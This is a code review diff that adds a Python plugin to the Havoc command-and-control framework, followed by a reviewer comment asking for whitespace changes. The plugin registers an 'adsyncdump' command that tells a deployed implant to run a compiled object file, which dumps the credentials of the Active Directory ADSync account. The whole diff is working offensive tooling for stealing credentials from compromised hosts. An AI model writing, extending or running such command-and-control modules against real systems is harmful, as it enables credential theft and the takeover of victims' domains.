adsyncdump.py

```diff
@@ -0,0 +1,15 @@
+from havoc import Demon, RegisterCommand
+
+def adsyncdump(demonID, *param):
+    TaskID : str    = None
+    demon  : Demon  = None
+
+    demon  = Demon( demonID )
+
+    TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to dump ADSync credentials" )
+    
+    demon.InlineExecute( TaskID, "go", f"adsyncdump.{demon.ProcessArch}.o", b'', False )
+
+    return TaskID
+
+RegisterCommand( adsyncdump, "", "adsyncdump", "Dump credentials of the ADSync account", 0, "", "" )
```

Comment:
Please remove whitespace around all of the outside of args, so `RegisterCommand(adsyncdump, "", "adsyncdump", "Dump credentials of the ADSync account", 0, "", "")`, please apply everywhere